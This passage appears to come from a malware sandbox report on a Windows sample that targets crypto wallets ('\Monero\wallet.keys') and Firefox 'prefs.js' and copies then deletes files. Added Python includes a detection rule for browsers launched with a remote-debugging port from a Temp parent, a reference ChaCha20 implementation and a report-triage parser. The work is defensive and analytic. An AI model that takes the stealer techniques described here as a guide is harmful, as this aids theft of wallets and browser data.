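PORT_RE = re.compile(r"--remote-debugging-port=(\d+)", re.IGNORECASE)
# The profile may be quoted and contain a space ("Profile 1") or be a bare token.
PROFILE_RE = re.compile(r'--profile-directory=(?:"([^"]*)"|(\S+))', re.IGNORECASE)
HEADLESS_RE = re.compile(r"--headless(?:=\w+)?\b", re.IGNORECASE)

@dataclass(frozen=True)
class Finding:
    pid: int
    image: str              # browser executable name, lower-case
    parent_image: str       # parent executable name, lower-case
    port: int
    profile: str | None
    headless: bool
    unexpected_parent: bool # parent is not one of EXPECTED_PARENTS

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyze_process_creation(event: dict) -> Finding | None:
    """Return a Finding when a Chromium browser is launched with a remote-debugging port, else None."""
    image = basename(event.get("Image", ""))
    if image not in CHROMIUM_BROWSERS:
        return None                      # notepad.exe with the same switch is not a browser
    cmd = event.get("CommandLine", "")
    port = PORT_RE.search(cmd)
    if not port:
        return None
    prof = PROFILE_RE.search(cmd)
    profile = None
    if prof:
        profile = prof.group(1) if prof.group(1) is not None else prof.group(2)
    parent = basename(event.get("ParentImage", ""))
    return Finding(
        pid=int(event.get("ProcessId", 0)),
        image=image,
        parent_image=parent,
        port=int(port.group(1)),
        profile=profile,
        headless=bool(HEADLESS_RE.search(cmd)),
        unexpected_parent=parent not in EXPECTED_PARENTS,
    )

def scan_events(events: list[dict]) -> list[Finding]:
    return [f for f in map(analyze_process_creation, events) if f]

# Constructed process-creation records in Sysmon Event ID 1 field naming.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
    {"ProcessId": 5012, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"'},
    {"ProcessId": 5044, "Image": r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "CommandLine": r'"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --remote-debugging-port=9229 --profile-directory="Profile 1"'},
    {"ProcessId": 6100, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msedge.exe --headless=new --remote-debugging-port=9222 --user-data-dir=C:\tmp\prof"},
    {"ProcessId": 6200, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe --remote-debugging-port=9229"},
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Developers and browser-automation frameworks also use --remote-debugging-port, so the rule reports the parent process, port and profile rather than treating every hit as malicious; a browser spawned by an executable in a user's Temp directory, with the profile directory passed explicitly, is the pattern that matches the strings recorded for this sample.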
                                  APIs
                                  • wsprintfA.USER32 ref: 007F3B1C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007F3B33
                                  • lstrcat.KERNEL32(?,?), ref: 007F3B85
                                  • StrCmpCA.SHLWAPI(?,00800F58), ref: 007F3B97
                                  • StrCmpCA.SHLWAPI(?,00800F5C), ref: 007F3BAD
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007F3EB7
                                  • FindClose.KERNEL32(000000FF), ref: 007F3ECC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: ea183089f946b29c16050c337732f758ed8d3eff73b4fa32b4412b2e9f0de415
                                  • Instruction ID: 5c55ebde450bf88047fc51894e5e972db2b69370bb23a7ecb8fc0859256573e2
                                  • Opcode Fuzzy Hash: ea183089f946b29c16050c337732f758ed8d3eff73b4fa32b4412b2e9f0de415
                                  • Instruction Fuzzy Hash: 89A12FB1A0020C9BDB24DFA4DC89FFE7378BB88300F044698B61D96291DB749B85CF61
                                  APIs
                                  • wsprintfA.USER32 ref: 007F4B7C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007F4B93
                                  • StrCmpCA.SHLWAPI(?,00800FC4), ref: 007F4BC1
                                  • StrCmpCA.SHLWAPI(?,00800FC8), ref: 007F4BD7
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DCD
                                  • FindClose.KERNEL32(000000FF), ref: 007F4DE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 0069227a3f0e69437ea995e84b04ac401b071c28316cae033d33b7027b57fa28
                                  • Instruction ID: 2315843b1724fdd017976a20dd0bd211b4282ccf9adebde5f90c7a07e2de835d
                                  • Opcode Fuzzy Hash: 0069227a3f0e69437ea995e84b04ac401b071c28316cae033d33b7027b57fa28
                                  • Instruction Fuzzy Hash: 226137B1904219ABCB24EBE4DC49FEE737CBB88700F004698F61996191EF749B85CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F47D0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F47D7
                                  • wsprintfA.USER32 ref: 007F47F6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007F480D
                                  • StrCmpCA.SHLWAPI(?,00800FAC), ref: 007F483B
                                  • StrCmpCA.SHLWAPI(?,00800FB0), ref: 007F4851
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007F48DB
                                  • FindClose.KERNEL32(000000FF), ref: 007F48F0
                                  • lstrcat.KERNEL32(?,0145E300), ref: 007F4915
                                  • lstrcat.KERNEL32(?,0145D438), ref: 007F4928
                                  • lstrlen.KERNEL32(?), ref: 007F4935
                                  • lstrlen.KERNEL32(?), ref: 007F4946
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: e59be691b07a1ecdefc3c0ab969cf2d5752384ee5ac74e54f44f7610b42434d7
                                  • Instruction ID: 0bd46a94fccfe150e1df24c886e81d3dcfc49c6b03555ced1a0bcd062a9391ba
                                  • Opcode Fuzzy Hash: e59be691b07a1ecdefc3c0ab969cf2d5752384ee5ac74e54f44f7610b42434d7
                                  • Instruction Fuzzy Hash: 385167B150421C9BCB64EBB4DC89FEE777CAB58300F404688F619961A1EF749B85CFA1
                                  APIs
                                  • wsprintfA.USER32 ref: 007F4113
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007F412A
                                  • StrCmpCA.SHLWAPI(?,00800F94), ref: 007F4158
                                  • StrCmpCA.SHLWAPI(?,00800F98), ref: 007F416E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007F42BC
                                  • FindClose.KERNEL32(000000FF), ref: 007F42D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: e29230db9f05ad3dbeb5d4e2e5b0d2c00f994d21d1e8c9f07ec651119a710c83
                                  • Instruction ID: 36b7201f5afa39b36ce3a80b62dcc870f6c9c532824bcfecb8eb5896fda9a9d5
                                  • Opcode Fuzzy Hash: e29230db9f05ad3dbeb5d4e2e5b0d2c00f994d21d1e8c9f07ec651119a710c83
                                  • Instruction Fuzzy Hash: 7D5158B150421CABCB24EBB0DC49EFE737CBB58300F404699B71996191EB759B898F51
                                  APIs
                                  • wsprintfA.USER32 ref: 007EEE3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 007EEE55
                                  • StrCmpCA.SHLWAPI(?,00801630), ref: 007EEEAB
                                  • StrCmpCA.SHLWAPI(?,00801634), ref: 007EEEC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EF3AE
                                  • FindClose.KERNEL32(000000FF), ref: 007EF3C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: e131cdf9b8d4c98e5bd818593ca4ef6396a36e0d9e3354831733e90ce58d0298
                                  • Instruction ID: e85046e59ddf9f1f40694a2be51fe87042a9ffc298a2b2e590f3154866710bb5
                                  • Opcode Fuzzy Hash: e131cdf9b8d4c98e5bd818593ca4ef6396a36e0d9e3354831733e90ce58d0298
                                  • Instruction Fuzzy Hash: 14E111F291121CEADB54EB64CC66EFE7339AF54300F4045D9B50A62192EF386B89CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                  • API String ID: 0-1562099544
                                  • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction ID: 579358f090c7f8ff789d17469a37a628e7a35225d4989b43f4e72cb9758a6bbd
                                  • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction Fuzzy Hash: A6E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
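The String ID field of the function above (in the 0080C000 dump, no API calls) lists the fragments "expa", "nd 3", "2-by" and "te k". In order they spell "expand 32-byte k", the 16-byte constant that Salsa20 and ChaCha20 both load into their state; the plugin sees it in 4-byte pieces because the key-setup code stores it as four 32-bit immediates. The constant alone does not say which of the two ciphers is present or what the sample encrypts with it. The following is an added example, not the sample's code: it reassembles the fragments into the four words an analyst would grep for in a dump, and gives a reference RFC 8439 ChaCha20 block function that places them at state words 0 to 3 so the sample's routine can be compared against it.

```python
"""Reassemble the 'expa' / 'nd 3' / '2-by' / 'te k' fragments and show where they live.

Added example, not code from the analysed sample: the fragments are the constant
shared by Salsa20 and ChaCha20, stored as four little-endian 32-bit words.
"""
import struct

# Fragments as printed in the report's String ID field, restored to their natural order.
FRAGMENTS = ("expa", "nd 3", "2-by", "te k")
SIGMA = "".join(FRAGMENTS).encode("ascii")  # b"expand 32-byte k"


def sigma_words():
    """The constant as the four little-endian u32 immediates a compiler emits for it."""
    return struct.unpack("<4I", SIGMA)


def sigma_signature():
    """Search patterns for a memory dump: the constant as ASCII, as u32 words, as 4-byte pieces."""
    words = sigma_words()
    return {
        "ascii": SIGMA,
        "u32_le": tuple("0x%08X" % x for x in words),
        "fragments": tuple(struct.pack("<I", x).decode("ascii") for x in words),
    }


def _rotl(v, n):
    return ((v << n) | (v >> (32 - n))) & 0xFFFFFFFF


def _quarter_round(s, a, b, c, d):
    # RFC 8439 section 2.1, operating in place on the 16-word state s.
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl(s[b] ^ s[c], 7)


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """RFC 8439 ChaCha20 block function: 64 keystream bytes for one (key, counter, nonce).

    State layout: words 0-3 are SIGMA, 4-11 the key, 12 the block counter, 13-15 the nonce.
    Salsa20 uses the same constant but places it at words 0, 5, 10 and 15.
    """
    if len(key) != 32 or len(nonce) != 12:
        raise ValueError("ChaCha20 needs a 32-byte key and a 12-byte nonce")
    state = (list(sigma_words()) + list(struct.unpack("<8I", key))
             + [counter & 0xFFFFFFFF] + list(struct.unpack("<3I", nonce)))
    w = state[:]
    for _ in range(10):  # 20 rounds = 10 double rounds (column round, then diagonal round)
        _quarter_round(w, 0, 4, 8, 12); _quarter_round(w, 1, 5, 9, 13)
        _quarter_round(w, 2, 6, 10, 14); _quarter_round(w, 3, 7, 11, 15)
        _quarter_round(w, 0, 5, 10, 15); _quarter_round(w, 1, 6, 11, 12)
        _quarter_round(w, 2, 7, 8, 13); _quarter_round(w, 3, 4, 9, 14)
    return struct.pack("<16I", *((x + y) & 0xFFFFFFFF for x, y in zip(w, state)))
```

When checking a dump, search for the ASCII string first, then for the four u32 values `sigma_signature()` returns; optimising compilers often emit only the latter, which is exactly the 4-byte-fragment view the report shows.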
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008016B0,00800D97), ref: 007EF81E
                                  • StrCmpCA.SHLWAPI(?,008016B4), ref: 007EF86F
                                  • StrCmpCA.SHLWAPI(?,008016B8), ref: 007EF885
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EFBB1
                                  • FindClose.KERNEL32(000000FF), ref: 007EFBC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: c88cf6f24596ac465e03a537c4905f90591d78cb8ed6fcd5b93d1b80c831f99f
                                  • Instruction ID: 7cdb887fcb2c50a5b5c06d035426b8372bdac690902179ac6329ec012fc94176
                                  • Opcode Fuzzy Hash: c88cf6f24596ac465e03a537c4905f90591d78cb8ed6fcd5b93d1b80c831f99f
                                  • Instruction Fuzzy Hash: E4B126B1A00158EBCB24EF64DD9AEFD7379AF54300F4085A8E50E57291EF345B49CB52
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0080523C,?,?,?,008052E4,?,?,00000000,?,00000000), ref: 007E1963
                                  • StrCmpCA.SHLWAPI(?,0080538C), ref: 007E19B3
                                  • StrCmpCA.SHLWAPI(?,00805434), ref: 007E19C9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007E1D80
                                  • DeleteFileA.KERNEL32(00000000), ref: 007E1E0A
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007E1E60
                                  • FindClose.KERNEL32(000000FF), ref: 007E1E72
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 9d1b1bbe90875303620139fb57b4d8f79e02cef3c43337a65134e8d1aea5a732
                                  • Instruction ID: ccb5cbe2a6f25635c3185f0ef19e8837821e61efaf67546605021ad5114a57f1
                                  • Opcode Fuzzy Hash: 9d1b1bbe90875303620139fb57b4d8f79e02cef3c43337a65134e8d1aea5a732
                                  • Instruction Fuzzy Hash: 9312C1B191011CEBCB15EB60CC6AAFE7379AF54300F4045D9B61E62291EF786B89CF61
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00800C32), ref: 007EDF5E
                                  • StrCmpCA.SHLWAPI(?,008015C0), ref: 007EDFAE
                                  • StrCmpCA.SHLWAPI(?,008015C4), ref: 007EDFC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EE4E0
                                  • FindClose.KERNEL32(000000FF), ref: 007EE4F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: 8ccf0fe680854ae5c3ed343b18e314ff0390eb514bc59aecf1e0e66d9caa97fc
                                  • Instruction ID: 1f12147205f70e2732542b5b6ba1229c52c82636ac045a8fa4a73da5592b7377
                                  • Opcode Fuzzy Hash: 8ccf0fe680854ae5c3ed343b18e314ff0390eb514bc59aecf1e0e66d9caa97fc
                                  • Instruction Fuzzy Hash: 5BF1ADB191411CEACB15EB60CDAAEFE7339BF54300F4045D9A21E62291EF386B49CF65
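Every function listed above with FindFirstFileA at 007F480D, 007F412A, 007EEE55, 007EF81E, 007E1963 and 007EDF5E follows the same shape: a search mask is built with wsprintfA ("%s\*", "%s\*.*"), FindFirstFileA opens the enumeration, two StrCmpCA calls against adjacent constant pointers run on each entry (the usual "." and ".." filter; the literals themselves are not printed in the report), a child path is built with "%s\%s" or lstrcat, FindNextFileA advances and FindClose releases the handle. The 007E1963 variant adds CopyFileA followed by DeleteFileA inside the loop, and the subcall strings show what is being looked for ("\Monero\wallet.keys", "prefs.js"). The following is an added triage helper, not Joe Sandbox code: it parses API lines in the report's own format and tags those patterns, so a long report can be skimmed for enumeration and staging routines. The two sample listings are copied from the report above; the tag names and heuristics are the author's.

```python
"""Triage helper for the per-function 'APIs' listings in a Joe Sandbox report.

Added example (not Joe Sandbox code): parses call lines in the report's format and
tags the file-enumeration and file-staging patterns. Heuristics are the author's.
"""
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# One call line, e.g.
#   • FindFirstFileA.KERNEL32(?,?), ref: 007F480D
#   • wsprintfA.USER32 ref: 007F47F6
#   • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
_CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# An argument the plugin could not resolve ('?') or rendered as an 8-digit hex value.
_OPAQUE_ARG = re.compile(r"^(?:\?|[0-9A-Fa-f]{8})$")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                # address of the call instruction
    subcall: Optional[str]  # callee address for 'Part of subcall function' lines, else None


def parse_api_lines(text: str):
    """Return the ApiCall entries in a block of report lines, in listing order."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if m is None:
            continue
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), m["sub"]))
    return calls


def literal_args(calls):
    """String literals the plugin resolved inline: any argument that is not '?' or a hex value."""
    return sorted({a for c in calls for a in c.args if not _OPAQUE_ARG.match(a)})


def classify(calls):
    """Tag a function by the direct (non-subcall) API sequence it contains."""
    direct = [c.api for c in calls if c.subcall is None]
    present = set(direct)
    tags = set()
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= present:
        tags.add("directory-enumeration")
        first, nxt = direct.index("FindFirstFileA"), direct.index("FindNextFileA")
        # Two compares per entry before advancing: consistent with a '.' / '..' filter
        # (inferred from the pattern; the report does not print the compared literals).
        if direct[first:nxt].count("StrCmpCA") >= 2:
            tags.add("two-strcmp-per-entry")
    if "wsprintfA" in present:
        tags.add("formats-search-path")
    if {"CopyFileA", "DeleteFileA"} <= present:
        tags.add("copies-then-deletes-file")
    if {"GetProcessHeap", "RtlAllocateHeap"} <= present:
        tags.add("heap-allocation")
    return tags


def triage(text: str):
    """Summary for one listing: call count, sorted tags, inline literals."""
    calls = parse_api_lines(text)
    return {"calls": len(calls), "tags": sorted(classify(calls)), "literals": literal_args(calls)}


# Sample input copied from the report above: the function with FindFirstFileA at 007E1963
# and the function with GetProcessHeap at 007F47D0.
RECORD_007E1963 = r"""
• Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0080523C,?,?,?,008052E4,?,?,00000000,?,00000000), ref: 007E1963
• StrCmpCA.SHLWAPI(?,0080538C), ref: 007E19B3
• StrCmpCA.SHLWAPI(?,00805434), ref: 007E19C9
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007E1D80
• DeleteFileA.KERNEL32(00000000), ref: 007E1E0A
• FindNextFileA.KERNEL32(000000FF,?), ref: 007E1E60
• FindClose.KERNEL32(000000FF), ref: 007E1E72
• Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
• Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
• Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
• Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
• Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
• Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
"""

RECORD_007F47D0 = r"""
• GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F47D0
• RtlAllocateHeap.NTDLL(00000000), ref: 007F47D7
• wsprintfA.USER32 ref: 007F47F6
• FindFirstFileA.KERNEL32(?,?), ref: 007F480D
• StrCmpCA.SHLWAPI(?,00800FAC), ref: 007F483B
• StrCmpCA.SHLWAPI(?,00800FB0), ref: 007F4851
• FindNextFileA.KERNEL32(000000FF,?), ref: 007F48DB
• FindClose.KERNEL32(000000FF), ref: 007F48F0
• lstrcat.KERNEL32(?,0145E300), ref: 007F4915
• lstrcat.KERNEL32(?,0145D438), ref: 007F4928
• lstrlen.KERNEL32(?), ref: 007F4935
• lstrlen.KERNEL32(?), ref: 007F4946
"""
```

Run `triage(RECORD_007E1963)` to get the tags and the "\Monero\wallet.keys" literal for that function; paste any other listing from the report into the same call. The classifier deliberately looks only at direct calls, since the "Part of subcall function" lines describe helpers shared by many callers and would otherwise tag every function that builds a path.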
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (lE$4~~$7\[$7{g9$C&{$^no{$y'N3$y'N3$*>{$x#
                                  • API String ID: 0-989139672
                                  • Opcode ID: 077db60a536bd58a201e51fd8ee7ed393a1d6da7a9240e59882ff1c7f85fec89
                                  • Instruction ID: a54ad9d77938eeff365a3f439f4a0ebfb376455cbae355e0a2d4912d0dc1f014
